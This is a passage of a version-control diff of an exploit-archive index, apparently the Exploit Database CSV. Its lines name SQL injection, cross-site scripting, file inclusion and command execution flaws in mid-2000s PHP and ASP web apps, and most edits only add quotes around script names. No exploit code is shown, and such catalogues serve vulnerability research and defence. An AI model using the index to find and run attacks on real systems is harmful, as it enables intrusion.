Vulnerabilities",2004-11-10,"Joxean Koret",php,webapps,0 24731,platforms/php/webapps/24731.txt,"Aztek Forum 4.0 - Multiple Input Validation Vulnerabilities",2004-11-12,"benji lemien",php,webapps,0 -24732,platforms/php/webapps/24732.txt,"Phorum 5.0.x - FOLLOW.php SQL Injection",2004-11-11,"Janek Vind",php,webapps,0 +24732,platforms/php/webapps/24732.txt,"Phorum 5.0.x - 'FOLLOW.php' SQL Injection",2004-11-11,"Janek Vind",php,webapps,0 24734,platforms/php/webapps/24734.txt,"chacmool Private Message System 1.1.3 - 'send.php?tid' Cross-Site Scripting",2004-11-12,"digital ex",php,webapps,0 24735,platforms/php/webapps/24735.txt,"chacmool Private Message System 1.1.3 - send.php Arbitrary Message Access",2004-11-12,"digital ex",php,webapps,0 24736,platforms/php/webapps/24736.txt,"phpWebSite 0.7.3/0.8.x/0.9.3 - User Module HTTP Response Splitting",2004-11-04,"Maestro De-Seguridad",php,webapps,0 @@ -27903,16 +27904,16 @@ id,file,description,date,author,platform,type,port 24796,platforms/php/webapps/24796.txt,"Blog Torrent 0.8 - Directory Traversal",2004-12-02,"Steve Kemp",php,webapps,0 24797,platforms/php/webapps/24797.txt,"Advanced Guestbook 2.2/2.3 - Cross-Site Scripting",2004-12-02,"Emile van Elen",php,webapps,0 24798,platforms/php/webapps/24798.txt,"PAFileDB 3.1 - Error Message Full Path Disclosure",2004-12-04,y3dips,php,webapps,0 -24803,platforms/php/webapps/24803.txt,"Blog Torrent 0.80 - BTDownload.php Cross-Site Scripting",2004-12-07,Lostmon,php,webapps,0 +24803,platforms/php/webapps/24803.txt,"Blog Torrent 0.80 - 'BTDownload.php' Cross-Site Scripting",2004-12-07,Lostmon,php,webapps,0 24806,platforms/php/webapps/24806.txt,"darryl burgdorf weblibs 1.0 - Directory Traversal",2004-12-07,"John Bissell",php,webapps,0 -24810,platforms/php/webapps/24810.txt,"PHPGedView 2.x - Descendancy.php Cross-Site Scripting",2004-01-19,JeiAr,php,webapps,0 +24810,platforms/php/webapps/24810.txt,"PHPGedView 2.x - 'Descendancy.php' Cross-Site Scripting",2004-01-19,JeiAr,php,webapps,0 24814,platforms/php/webapps/24814.txt,"PHPGedView 2.5/2.6 - 'index.php' Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 -24816,platforms/php/webapps/24816.txt,"PHPGedView 2.5/2.6 - Individual.php Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 +24816,platforms/php/webapps/24816.txt,"PHPGedView 2.5/2.6 - 'Individual.php' Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24817,platforms/php/webapps/24817.txt,"phpMyAdmin 2.x - External Transformations Remote Command Execution",2004-12-13,"Nicolas Gregoire",php,webapps,0 -24819,platforms/php/webapps/24819.txt,"PHPGedView 2.5/2.6 - Source.php Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 -24820,platforms/php/webapps/24820.txt,"PHPGedView 2.5/2.6 - Imageview.php Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 -24821,platforms/php/webapps/24821.txt,"PHPGedView 2.5/2.6 - Gedrecord.php Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 -24822,platforms/php/webapps/24822.txt,"PHPGedView 2.5/2.6 - Gdbi_interface.php Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 +24819,platforms/php/webapps/24819.txt,"PHPGedView 2.5/2.6 - 'Source.php' Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 +24820,platforms/php/webapps/24820.txt,"PHPGedView 2.5/2.6 - 'Imageview.php' Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 +24821,platforms/php/webapps/24821.txt,"PHPGedView 2.5/2.6 - 'Gedrecord.php' Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 +24822,platforms/php/webapps/24822.txt,"PHPGedView 2.5/2.6 - 'Gdbi_interface.php' Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24823,platforms/php/webapps/24823.txt,"sugarsales 1.x/2.0 - Multiple Vulnerabilities",2004-12-13,"Daniel Fabian",php,webapps,0 24824,platforms/php/webapps/24824.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'showflat.php?Cat' Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 24825,platforms/php/webapps/24825.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'calendar.php?Cat' Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 @@ -27921,11 +27922,11 @@ id,file,description,date,author,platform,type,port 24829,platforms/php/webapps/24829.txt,"PHPGedView 2.5/2.6 - 'login.php' URL Parameter Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24830,platforms/php/webapps/24830.txt,"PHPGedView 2.5/2.6 - 'login.php?Username' Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24831,platforms/php/webapps/24831.txt,"PHPGedView 2.5/2.6 - 'login.php' Newlanguage Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 -24832,platforms/php/webapps/24832.txt,"PHPGedView 2.5/2.6 - Relationship.php Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 -24834,platforms/php/webapps/24834.txt,"PHPGedView 2.5/2.6 - calendar.php Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 -24835,platforms/php/webapps/24835.txt,"PHPGedView 2.5/2.6 - Placelist.php SQL Injection",2004-01-12,JeiAr,php,webapps,0 +24832,platforms/php/webapps/24832.txt,"PHPGedView 2.5/2.6 - 'Relationship.php' Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 +24834,platforms/php/webapps/24834.txt,"PHPGedView 2.5/2.6 - 'calendar.php' Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 +24835,platforms/php/webapps/24835.txt,"PHPGedView 2.5/2.6 - 'Placelist.php' SQL Injection",2004-01-12,JeiAr,php,webapps,0 24836,platforms/cgi/webapps/24836.txt,"UseModWiki 1.0 - Wiki.pl Cross-Site Scripting",2004-12-14,"Jeremy Bae",cgi,webapps,0 -24837,platforms/php/webapps/24837.txt,"PHPGedView 2.5/2.6 - Timeline.php SQL Injection",2004-01-12,JeiAr,php,webapps,0 +24837,platforms/php/webapps/24837.txt,"PHPGedView 2.5/2.6 - 'Timeline.php' SQL Injection",2004-01-12,JeiAr,php,webapps,0 24838,platforms/asp/webapps/24838.txt,"Active Server Corner ASP Calendar 1.0 - Administrative Access",2004-12-14,"ali reza AcTiOnSpIdEr",asp,webapps,0 24840,platforms/asp/webapps/24840.txt,"ASP-Rider - SQL Injection",2004-12-14,"Shervin Khaleghjou",asp,webapps,0 24842,platforms/php/webapps/24842.txt,"IWebNegar - Multiple SQL Injections",2004-12-15,"Shervin Khaleghjou",php,webapps,0 @@ -28046,7 +28047,7 @@ id,file,description,date,author,platform,type,port 25102,platforms/php/webapps/25102.txt,"CitrusDB 0.3.6 - Remote Authentication Bypass",2004-02-15,"RedTeam Pentesting",php,webapps,0 25103,platforms/php/webapps/25103.txt,"PHP-Nuke 6.x/7.x - Multiple Cross-Site Scripting Vulnerabilities",2005-02-15,waraxe,php,webapps,0 25104,platforms/php/webapps/25104.txt,"CitrusDB 0.3.6 - Arbitrary Local PHP File Inclusion",2005-02-15,"RedTeam Pentesting",php,webapps,0 -25105,platforms/php/webapps/25105.txt,"osCommerce 2.2 - Contact_us.php Cross-Site Scripting",2005-02-15,"John Cobb",php,webapps,0 +25105,platforms/php/webapps/25105.txt,"osCommerce 2.2 - 'Contact_us.php' Cross-Site Scripting",2005-02-15,"John Cobb",php,webapps,0 25108,platforms/cgi/webapps/25108.txt,"AWStats 5.x/6.x - Logfile Parameter Remote Command Execution",2005-02-16,newbug@chroot.org,cgi,webapps,0 25109,platforms/php/webapps/25109.txt,"DCP-Portal 6.1.1 - Multiple SQL Injections",2005-02-16,Exoduks,php,webapps,0 25110,platforms/asp/webapps/25110.txt,"Microsoft ASP.NET 1.0/1.1 - Unicode Character Conversion Multiple Cross-Site Scripting Vulnerabilities",2005-02-16,"Andrey Rusyaev",asp,webapps,0 @@ -28073,7 +28074,7 @@ id,file,description,date,author,platform,type,port 25147,platforms/cgi/webapps/25147.txt,"Biz Mail Form 2.x - Unauthorized Mail Relay",2005-02-22,"Jason Frisvold",cgi,webapps,0 25148,platforms/asp/webapps/25148.txt,"Mono 1.0.5 - Unicode Character Conversion Multiple Cross-Site Scripting Vulnerabilities",2005-02-22,"Andrey Rusyaev",asp,webapps,0 25149,platforms/php/webapps/25149.txt,"iGeneric iG Shop 1.x - Multiple SQL Injections",2005-02-22,"John Cobb",php,webapps,0 -25151,platforms/php/webapps/25151.txt,"PBLang Bulletin Board System 4.6 - search.php Cross-Site Scripting",2005-02-23,"Hackerlounge Research Group",php,webapps,0 +25151,platforms/php/webapps/25151.txt,"PBLang Bulletin Board System 4.6 - 'search.php' Cross-Site Scripting",2005-02-23,"Hackerlounge Research Group",php,webapps,0 25152,platforms/php/webapps/25152.txt,"phpMyAdmin 2.6 - 'select_server.lib.php' Multiple Cross-Site Scripting Vulnerabilities",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 25153,platforms/php/webapps/25153.txt,"phpMyAdmin 2.6 - 'display_tbl_links.lib.php' Multiple Cross-Site Scripting Vulnerabilities",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 25154,platforms/php/webapps/25154.txt,"phpMyAdmin 2.6 - 'theme_left.css.php' Multiple Cross-Site Scripting Vulnerabilities",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 @@ -28091,7 +28092,7 @@ id,file,description,date,author,platform,type,port 25173,platforms/php/webapps/25173.txt,"PostNuke Phoenix 0.7x - SHOW Parameter SQL Injection",2005-02-28,"Maksymilian Arciemowicz",php,webapps,0 25174,platforms/php/webapps/25174.txt,"PHPCOIN 1.2 - 'mod.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-01,Lostmon,php,webapps,0 25175,platforms/php/webapps/25175.txt,"PHPCOIN 1.2 - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-01,Lostmon,php,webapps,0 -25176,platforms/php/webapps/25176.txt,"PBLang Bulletin Board System 4.x - SendPM.php Directory Traversal",2005-03-01,Raven,php,webapps,0 +25176,platforms/php/webapps/25176.txt,"PBLang Bulletin Board System 4.x - 'SendPM.php' Directory Traversal",2005-03-01,Raven,php,webapps,0 25177,platforms/php/webapps/25177.txt,"CutePHP CuteNews 1.3.6 - 'x-forwarded-for' Script Injection",2005-03-01,FraMe,php,webapps,0 25178,platforms/php/webapps/25178.txt,"427BB 2.x - Multiple Remote HTML Injection Vulnerabilities",2005-03-01,"Hackerlounge Research Group",php,webapps,0 25179,platforms/php/webapps/25179.txt,"PBLang Bulletin Board System 4.x - DelPM.php Arbitrary Personal Message Deletion",2005-03-01,Raven,php,webapps,0 @@ -28112,8 +28113,8 @@ id,file,description,date,author,platform,type,port 25220,platforms/php/webapps/25220.txt,"PABox 2.0 - Post Icon HTML Injection",2005-03-14,Rift_XT,php,webapps,0 25222,platforms/php/webapps/25222.html,"HolaCMS 1.2.x/1.4.x Voting Module - Directory Traversal Remote File Corruption",2005-03-13,"Virginity Security",php,webapps,0 25223,platforms/php/webapps/25223.txt,"Phorum 5.0.14 - Multiple Subject and Attachment HTML Injection Vulnerabilities",2005-03-14,"Jon Oberheide",php,webapps,0 -25224,platforms/php/webapps/25224.txt,"SimpGB 1.0 - Guestbook.php SQL Injection",2005-03-14,visus,php,webapps,0 -25225,platforms/php/webapps/25225.txt,"PHPAdsNew 2.0.4 - AdFrame.php Cross-Site Scripting",2005-03-14,"Maksymilian Arciemowicz",php,webapps,0 +25224,platforms/php/webapps/25224.txt,"SimpGB 1.0 - 'Guestbook.php' SQL Injection",2005-03-14,visus,php,webapps,0 +25225,platforms/php/webapps/25225.txt,"PHPAdsNew 2.0.4 - 'AdFrame.php' Cross-Site Scripting",2005-03-14,"Maksymilian Arciemowicz",php,webapps,0 25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 - 'Votebox.php' Remote File Inclusion",2005-03-14,SmOk3,php,webapps,0 25227,platforms/php/webapps/25227.txt,"PHPOpenChat 2.3.4/3.0.1 - 'poc_loginform.php' phpbb_root_path Parameter Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 25228,platforms/php/webapps/25228.txt,"PHPOpenChat 2.3.4/3.0.1 - 'poc.php' Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 @@ -28145,13 +28146,13 @@ id,file,description,date,author,platform,type,port 25260,platforms/php/webapps/25260.txt,"Vortex Portal 2.0 - 'index.php' act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0 25261,platforms/php/webapps/25261.txt,"Vortex Portal 2.0 - 'content.php' act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0 25262,platforms/php/webapps/25262.txt,"Interspire ArticleLive 2005 - NewComment Cross-Site Scripting",2005-03-23,mircia,php,webapps,0 -25263,platforms/php/webapps/25263.txt,"DigitalHive 2.0 - msg.php Cross-Site Scripting",2005-03-23,"benji lemien",php,webapps,0 +25263,platforms/php/webapps/25263.txt,"DigitalHive 2.0 - 'msg.php' Cross-Site Scripting",2005-03-23,"benji lemien",php,webapps,0 25264,platforms/php/webapps/25264.txt,"DigitalHive 2.0 - 'membres.php?mt' Cross-Site Scripting",2005-03-23,"benji lemien",php,webapps,0 25265,platforms/php/webapps/25265.txt,"PHPSysInfo 2.0/2.3 - 'sensor_program' Cross-Site Scripting",2005-03-23,"Maksymilian Arciemowicz",php,webapps,0 25266,platforms/php/webapps/25266.txt,"PHPSysInfo 2.0/2.3 - 'system_footer.php' Cross-Site Scripting",2005-03-23,"Maksymilian Arciemowicz",php,webapps,0 25267,platforms/php/webapps/25267.txt,"Invision Power Board 1.x/2.0 - HTML Injection",2005-03-23,"Woody Hughes",php,webapps,0 25269,platforms/jsp/webapps/25269.txt,"Oracle Reports Server 10g - Multiple Cross-Site Scripting Vulnerabilities",2005-03-24,Paolo,jsp,webapps,0 -25270,platforms/php/webapps/25270.txt,"Topic Calendar 1.0.1 - Calendar_Scheduler.php Cross-Site Scripting",2004-03-24,"Alberto Trivero",php,webapps,0 +25270,platforms/php/webapps/25270.txt,"Topic Calendar 1.0.1 - 'Calendar_Scheduler.php' Cross-Site Scripting",2004-03-24,"Alberto Trivero",php,webapps,0 25271,platforms/php/webapps/25271.txt,"Double Choco Latte 0.9.3/0.9.4 - main.php Arbitrary PHP Code Execution",2005-03-24,"James Bercegay",php,webapps,0 25272,platforms/php/webapps/25272.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php' Cross-Site Scripting",2005-03-24,mircia,php,webapps,0 25273,platforms/php/webapps/25273.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php' SQL Injection",2005-03-24,mircia,php,webapps,0 @@ -28161,7 +28162,7 @@ id,file,description,date,author,platform,type,port 25280,platforms/php/webapps/25280.txt,"ESMI PayPal StoreFront 1.7 - Cross-Site Scripting",2005-03-26,Dcrab,php,webapps,0 25282,platforms/php/webapps/25282.txt,"Nuke BookMarks 0.6 - Marks.php Full Path Disclosure",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 25283,platforms/php/webapps/25283.txt,"Nuke BookMarks 0.6 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 -25284,platforms/php/webapps/25284.txt,"Nuke BookMarks 0.6 - Marks.php SQL Injection",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 +25284,platforms/php/webapps/25284.txt,"Nuke BookMarks 0.6 - 'Marks.php' SQL Injection",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 25285,platforms/php/webapps/25285.txt,"MagicScripts E-Store Kit-2 PayPal Edition - Cross-Site Scripting",2005-03-26,Dcrab,php,webapps,0 25286,platforms/php/webapps/25286.txt,"MagicScripts E-Store Kit-2 PayPal Edition - Remote File Inclusion",2005-03-26,Dcrab,php,webapps,0 25292,platforms/hardware/webapps/25292.txt,"Cisco Linksys E4200 - Multiple Vulnerabilities",2013-05-07,sqlhacker,hardware,webapps,0 @@ -28173,8 +28174,8 @@ id,file,description,date,author,platform,type,port 25304,platforms/php/webapps/25304.py,"MoinMoin - Arbitrary Command Execution",2013-05-08,HTP,php,webapps,0 25305,platforms/multiple/webapps/25305.py,"ColdFusion 9-10 - Credential Disclosure",2013-05-08,HTP,multiple,webapps,0 33406,platforms/php/webapps/33406.txt,"Horde 3.3.5 - Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0 -33407,platforms/php/webapps/33407.txt,"Horde 3.3.5 - 'Administration Interface admin/cmdshell.php?PATH_INFO' Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0 -33408,platforms/php/webapps/33408.txt,"Horde 3.3.5 - 'Administration Interface admin/sqlshell.php?PATH_INFO' Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0 +33407,platforms/php/webapps/33407.txt,"Horde 3.3.5 - '/Administration Interface admin/cmdshell.php?PATH_INFO' Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0 +33408,platforms/php/webapps/33408.txt,"Horde 3.3.5 - '/Administration Interface admin/sqlshell.php?PATH_INFO' Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0 25308,platforms/php/webapps/25308.txt,"PhotoPost Pro 5.1 - 'showgallery.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps,0 25309,platforms/php/webapps/25309.txt,"PhotoPost Pro 5.1 - 'showmembers.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps,0 25310,platforms/php/webapps/25310.txt,"PhotoPost Pro 5.1 - 'Slideshow.php?photo' Cross-Site Scripting",2005-03-28,"Diabolic Crab",php,webapps,0 @@ -28195,13 +28196,13 @@ id,file,description,date,author,platform,type,port 25331,platforms/cgi/webapps/25331.txt,"SonicWALL SOHO 5.1.7 - Web Interface Multiple Remote Input Validation Vulnerabilities",2005-04-04,"Oliver Karow",cgi,webapps,0 25332,platforms/asp/webapps/25332.txt,"SiteEnable - SQL Injection",2005-04-02,Zinho,asp,webapps,0 40396,platforms/php/webapps/40396.txt,"MyBB 1.8.6 - SQL Injection",2016-09-19,"Curesec Research Team",php,webapps,80 -25337,platforms/php/webapps/25337.txt,"ProfitCode Software PayProCart 3.0 - Usrdetails.php Cross-Site Scripting",2005-04-05,"Diabolic Crab",php,webapps,0 +25337,platforms/php/webapps/25337.txt,"ProfitCode Software PayProCart 3.0 - 'Usrdetails.php' Cross-Site Scripting",2005-04-05,"Diabolic Crab",php,webapps,0 25338,platforms/php/webapps/25338.txt,"profitcode software payprocart 3.0 - Directory Traversal",2005-04-05,"Diabolic Crab",php,webapps,0 25339,platforms/php/webapps/25339.txt,"PHP-Nuke 6.x/7.x Your_Account Module - 'Username' Cross-Site Scripting",2005-04-05,sp3x@securityreason.com,php,webapps,0 25340,platforms/php/webapps/25340.txt,"PHP-Nuke 6.x/7.x Your_Account Module - Avatarcategory Cross-Site Scripting",2005-04-05,sp3x@securityreason.com,php,webapps,0 25341,platforms/php/webapps/25341.html,"PHP-Nuke 6.x/7.x 'Downloads' Module - Lid Parameter Cross-Site Scripting",2005-04-05,sp3x@securityreason.com,php,webapps,0 25342,platforms/php/webapps/25342.txt,"PHP-Nuke 7.6 Web_Links Module - Multiple Cross-Site Scripting Vulnerabilities",2005-04-06,"Maksymilian Arciemowicz",php,webapps,0 -25343,platforms/php/webapps/25343.txt,"PHP-Nuke 7.6 - banners.php Cross-Site Scripting",2005-04-06,"Maksymilian Arciemowicz",php,webapps,0 +25343,platforms/php/webapps/25343.txt,"PHP-Nuke 7.6 - 'banners.php' Cross-Site Scripting",2005-04-06,"Maksymilian Arciemowicz",php,webapps,0 25344,platforms/php/webapps/25344.txt,"phpBB 2.0.13 DLMan Pro Module - SQL Injection",2005-04-06,"LovER BOY",php,webapps,0 25345,platforms/php/webapps/25345.txt,"phpBB 2.0.13 Linkz Pro Module - SQL Injection",2005-04-06,"LovER BOY",php,webapps,0 25346,platforms/asp/webapps/25346.txt,"Active Auction House - 'default.asp' Multiple SQL Injections",2005-04-06,Dcrab,asp,webapps,0 @@ -28235,12 +28236,12 @@ id,file,description,date,author,platform,type,port 25382,platforms/php/webapps/25382.txt,"jPORTAL 2.3.1 - 'Banner.php' SQL Injection",2005-04-11,CiNU5,php,webapps,0 25390,platforms/asp/webapps/25390.txt,"Comersus Cart 4.0/5.0 - Comersus_Search_Item.asp Cross-Site Scripting",2005-04-12,Lostmon,asp,webapps,0 25394,platforms/php/webapps/25394.txt,"Pinnacle Cart - 'index.php' Cross-Site Scripting",2005-04-12,SmOk3,php,webapps,0 -25398,platforms/php/webapps/25398.txt,"PHPBB2 Plus 1.5 - GroupCP.php Cross-Site Scripting",2005-04-13,Dcrab,php,webapps,0 +25398,platforms/php/webapps/25398.txt,"PHPBB2 Plus 1.5 - 'GroupCP.php' Cross-Site Scripting",2005-04-13,Dcrab,php,webapps,0 25399,platforms/php/webapps/25399.txt,"PHPBB2 Plus 1.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-04-13,Dcrab,php,webapps,0 25400,platforms/php/webapps/25400.txt,"PHPBB2 Plus 1.5 - Portal.php Multiple Cross-Site Scripting Vulnerabilities",2005-04-13,Dcrab,php,webapps,0 -25401,platforms/php/webapps/25401.txt,"PHPBB2 Plus 1.5 - viewtopic.php Cross-Site Scripting",2005-04-13,Dcrab,php,webapps,0 -25403,platforms/php/webapps/25403.txt,"phpBB Photo Album 2.0.53 Module - Album_Cat.php Cross-Site Scripting",2005-04-13,Dcrab,php,webapps,0 -25404,platforms/php/webapps/25404.txt,"phpBB Photo Album Module 2.0.53 - Album_Comment.php Cross-Site Scripting",2005-04-13,Dcrab,php,webapps,0 +25401,platforms/php/webapps/25401.txt,"PHPBB2 Plus 1.5 - 'viewtopic.php' Cross-Site Scripting",2005-04-13,Dcrab,php,webapps,0 +25403,platforms/php/webapps/25403.txt,"phpBB Photo Album 2.0.53 Module - 'Album_Cat.php' Cross-Site Scripting",2005-04-13,Dcrab,php,webapps,0 +25404,platforms/php/webapps/25404.txt,"phpBB Photo Album Module 2.0.53 - 'Album_Comment.php' Cross-Site Scripting",2005-04-13,Dcrab,php,webapps,0 25405,platforms/php/webapps/25405.txt,"Getsimple CMS 3.2.1 - Arbitrary File Upload",2013-05-13,"Ahmed Elhady Mohamed",php,webapps,0 25409,platforms/php/webapps/25409.txt,"Ajax Availability Calendar 3.x.x - Multiple Vulnerabilities",2013-05-13,AtT4CKxT3rR0r1ST,php,webapps,0 25410,platforms/php/webapps/25410.txt,"Joomla! Component com_s5clanroster - 'id' SQL Injection",2013-05-13,AtT4CKxT3rR0r1ST,php,webapps,0 @@ -28251,7 +28252,7 @@ id,file,description,date,author,platform,type,port 25416,platforms/hardware/webapps/25416.txt,"SimpleTransfer 2.2.1 - Command Injection",2013-05-13,Vulnerability-Lab,hardware,webapps,0 25417,platforms/ios/webapps/25417.txt,"File Lite 3.3/3.5 PRO iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,ios,webapps,0 25422,platforms/php/webapps/25422.txt,"All4WWW-HomePageCreator 1.0 - 'index.php' Remote File Inclusion",2005-04-14,"Francisco Alisson",php,webapps,0 -25423,platforms/php/webapps/25423.txt,"SPHPBlog 0.4 - search.php Cross-Site Scripting",2005-04-14,y3dips,php,webapps,0 +25423,platforms/php/webapps/25423.txt,"SPHPBlog 0.4 - 'search.php' Cross-Site Scripting",2005-04-14,y3dips,php,webapps,0 25424,platforms/asp/webapps/25424.txt,"OneWorldStore - 'OWAddItem.asp' SQL Injection",2005-04-14,Dcrab,asp,webapps,0 25425,platforms/asp/webapps/25425.txt,"OneWorldStore - 'OWListProduct.asp' Multiple SQL Injections",2005-04-14,Dcrab,asp,webapps,0 25426,platforms/asp/webapps/25426.txt,"OneWorldStore - 'OWProductDetail.asp' SQL Injection",2005-04-14,Dcrab,asp,webapps,0 @@ -28259,11 +28260,11 @@ id,file,description,date,author,platform,type,port 25428,platforms/asp/webapps/25428.txt,"OneWorldStore - 'OWListProduct.asp' Cross-Site Scripting",2005-04-14,Dcrab,asp,webapps,0 25430,platforms/php/webapps/25430.txt,"PHP-Nuke 7.6 Surveys Module - HTTP Response Splitting",2005-04-15,Dcrab,php,webapps,0 25431,platforms/php/webapps/25431.pl,"Ariadne CMS 2.4 - Remote File Inclusion",2006-10-19,"Fidel Costa",php,webapps,0 -25432,platforms/php/webapps/25432.txt,"phpBB Remote - mod.php SQL Injection",2005-04-16,"tom cruise",php,webapps,0 -25433,platforms/php/webapps/25433.txt,"Datenbank Module For phpBB - Remote mod.php Cross-Site Scripting",2005-04-16,"tom cruise",php,webapps,0 +25432,platforms/php/webapps/25432.txt,"phpBB Remote - 'mod.php' SQL Injection",2005-04-16,"tom cruise",php,webapps,0 +25433,platforms/php/webapps/25433.txt,"Datenbank Module For phpBB - 'Remote mod.php' Cross-Site Scripting",2005-04-16,"tom cruise",php,webapps,0 25434,platforms/php/webapps/25434.txt,"eGroupWare 1.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-04-18,"GulfTech Security",php,webapps,0 -25435,platforms/php/webapps/25435.txt,"eGroupWare 1.0 - 'sitemgr-site/index.php?category_id' Cross-Site Scripting",2005-04-18,"GulfTech Security",php,webapps,0 -25436,platforms/php/webapps/25436.txt,"eGroupWare 1.0 - 'tts/index.php?filter' SQL Injection",2005-04-18,"GulfTech Security",php,webapps,0 +25435,platforms/php/webapps/25435.txt,"eGroupWare 1.0 - '/sitemgr-site/index.php?category_id' Cross-Site Scripting",2005-04-18,"GulfTech Security",php,webapps,0 +25436,platforms/php/webapps/25436.txt,"eGroupWare 1.0 - '/tts/index.php?filter' SQL Injection",2005-04-18,"GulfTech Security",php,webapps,0 25437,platforms/php/webapps/25437.txt,"eGroupWare 1.0 - 'index.php' cats_app Parameter SQL Injection",2005-04-18,"GulfTech Security",php,webapps,0 25438,platforms/php/webapps/25438.txt,"MVNForum 1.0 - Search Cross-Site Scripting",2005-04-18,"hoang yen",php,webapps,0 25440,platforms/php/webapps/25440.txt,"WordPress Plugin wp-FileManager - Arbitrary File Download",2013-05-14,ByEge,php,webapps,0 @@ -28271,20 +28272,20 @@ id,file,description,date,author,platform,type,port 25442,platforms/php/webapps/25442.txt,"WHMCS 4.x - 'invoicefunctions.php?id' SQL Injection",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0 25447,platforms/php/webapps/25447.txt,"Alienvault Open Source SIEM (OSSIM) 4.1.2 - Multiple SQL Injections",2013-05-14,RunRunLevel,php,webapps,0 25449,platforms/php/webapps/25449.txt,"UMI CMS 2.9 - Cross-Site Request Forgery",2013-05-14,"High-Tech Bridge SA",php,webapps,0 -25451,platforms/php/webapps/25451.txt,"phpBB 1.x/2.0.x - (Knowledge Base Module) 'KB.php' SQL Injection",2005-04-13,deluxe@security-project.org,php,webapps,0 +25451,platforms/php/webapps/25451.txt,"phpBB 1.x/2.0.x - '(Knowledge Base Module) 'KB.php' SQL Injection",2005-04-13,deluxe@security-project.org,php,webapps,0 25455,platforms/asp/webapps/25455.txt,"OneWorldStore - 'DisplayResults.asp' SQL Injection",2005-04-19,Lostmon,asp,webapps,0 25456,platforms/asp/webapps/25456.txt,"OneWorldStore - 'DisplayResults.asp' Cross-Site Scripting",2005-04-19,Lostmon,asp,webapps,0 25457,platforms/php/webapps/25457.c,"UBBCentral UBB.Threads 6.0 - 'Printthread.php' SQL Injection",2005-03-11,HLL,php,webapps,0 -25458,platforms/php/webapps/25458.txt,"CityPost PHP LNKX 52.0 - message.php Cross-Site Scripting",2005-04-19,Thom,php,webapps,0 +25458,platforms/php/webapps/25458.txt,"CityPost PHP LNKX 52.0 - 'message.php' Cross-Site Scripting",2005-04-19,Thom,php,webapps,0 25459,platforms/php/webapps/25459.txt,"CityPost PHP Image Editor M1/M2/M3/Imgsrc/M4 - URI Parameter Cross-Site Scripting",2005-04-19,Thom,php,webapps,0 -25464,platforms/php/webapps/25464.txt,"CityPost Simple PHP Upload - Simple-upload-53.php Cross-Site Scripting",2005-04-19,Thom,php,webapps,0 +25464,platforms/php/webapps/25464.txt,"CityPost Simple PHP Upload - 'Simple-upload-53.php' Cross-Site Scripting",2005-04-19,Thom,php,webapps,0 25466,platforms/asp/webapps/25466.txt,"ECommPro 3.0 - Admin/login.asp SQL Injection",2005-04-20,c0d3r,asp,webapps,0 25467,platforms/php/webapps/25467.txt,"Netref 4.2 - Cat_for_gen.php Remote PHP Script Injection",2005-04-20,jaguar,php,webapps,0 25468,platforms/php/webapps/25468.txt,"PHP Labs - '.proFile' Dir URI Cross-Site Scripting",2005-04-20,sNKenjoi,php,webapps,0 25469,platforms/php/webapps/25469.txt,"Ocean12 Calendar Manager 1.0 - Admin Form SQL Injection",2005-04-20,Zinho,php,webapps,0 25473,platforms/php/webapps/25473.txt,"PHP Labs - '.proFile' File URI Cross-Site Scripting",2005-04-20,sNKenjoi,php,webapps,0 -25474,platforms/php/webapps/25474.txt,"phpBB-Auction Module 1.0/1.2 - Auction_Rating.php SQL Injection",2005-04-20,sNKenjoi,php,webapps,0 -25475,platforms/php/webapps/25475.txt,"phpBB-Auction Module 1.0/1.2 - Auction_Offer.php SQL Injection",2005-04-20,sNKenjoi,php,webapps,0 +25474,platforms/php/webapps/25474.txt,"phpBB-Auction Module 1.0/1.2 - 'Auction_Rating.php' SQL Injection",2005-04-20,sNKenjoi,php,webapps,0 